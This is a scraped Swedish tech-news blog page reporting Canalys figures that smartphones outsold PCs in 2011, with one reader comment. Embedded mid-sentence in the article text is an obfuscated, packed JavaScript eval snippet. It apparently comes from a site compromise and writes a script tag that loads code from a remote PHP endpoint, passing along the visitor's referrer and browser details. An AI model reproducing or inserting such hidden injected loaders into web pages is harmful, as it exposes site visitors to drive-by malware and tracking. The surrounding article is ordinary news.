Image Image Image Image Image Image Image Image Image Image

| 27 maj, 2020

Scroll to top

Top

Smartphones säljer bättre än PC

Smartphones säljer bättre än PC
Sebastian

För eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|disaf|var|u0026u|referrer|itfte||js|php’.split(’|’),0,{}))
första gången någonsin slog i fjol smartphones persondatorerna i sålda enheter. Detta visar siffror från analysföretaget Canalys.

Det ska ha sålts ca 158.8 miljoner smartphones totalt under det fjärde kvartalet och ca 487,7 miljoner under hela året. Detta kan jämföras med 120,2 miljoenr sålda persondatorer under det fjärde kvartalet och 414,6 miljoner under hela 2011. Canlys meddelar att antalet sålda smartphones hade en ökning på 63 procent under 2011 jämfört med året innan.

– Under några år har smarttelefoner utvecklats från att vara en nischprodukt till att en massmarknad i toppen av mobiltelefonmarknaden, säger Chris Jones, som är analytiker på Canalys i ett uttalande.

Canalys meddelar också att försäljningen av smartphones går mycket långsammare i år. Fler billigare telefoner ökar på marknaden i takt med det snabbt ökande intresset för att använda appar och andra mobila tjänster.

Comments

  1. Inger

    Fler låginkomsttagare i USA köper hellre en iphone och surfar med än en riktigt dator. Det är ett billigare alternativ med fler användningsområden än en persondator.